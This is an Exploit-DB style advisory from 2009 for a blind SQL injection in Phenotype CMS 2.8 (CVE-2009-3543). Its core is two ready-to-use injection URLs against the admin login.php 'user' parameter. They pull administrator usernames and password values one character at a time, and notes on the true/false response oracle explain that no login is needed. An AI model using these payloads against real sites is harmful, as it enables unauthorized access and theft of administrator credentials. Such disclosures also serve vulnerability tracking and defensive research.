Phenotype CMS 2.8 login.php user Blind SQL Injection Vulnerability

2009-07-10T00:00:00
ID EDB-ID:9107
Type exploitdb
Reporter Khashayar Fereidani
Modified 2009-07-10T00:00:00

Description

Phenotype CMS 2.8 (login.php user) Blind SQL Injection Vulnerability. CVE-2009-3543. Webapps exploit for php platform

                                        
                                            #####################################################################################
####                   Phenotype v2.8  Blind Sql Injection                       ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://ircrash.com                                                      #
#My Official WebSite : http://r3dw0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://www.phenotype-cms.com                                            #
#                                                                                   #
#Dork : :(                                                                          #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_login from user limit 1,1),1,1))=[ascii code try]/*
#http://[site]/_phenotype/admin/login.php?user=-999') and ascii(substring((select user_pass from user limit 1,1),1,1))=[ascii code try]/*
#                                                                                   #
#Note :                                                                             #
#1. This bug in admin folder, but u dont need to login,u can use bug with out login #
#2. If ascii is true u see login page else u see 500 Internal Server Error          #
#                                                                                   #
###################################### TNX GOD ######################################

# milw0rm.com [2009-07-10]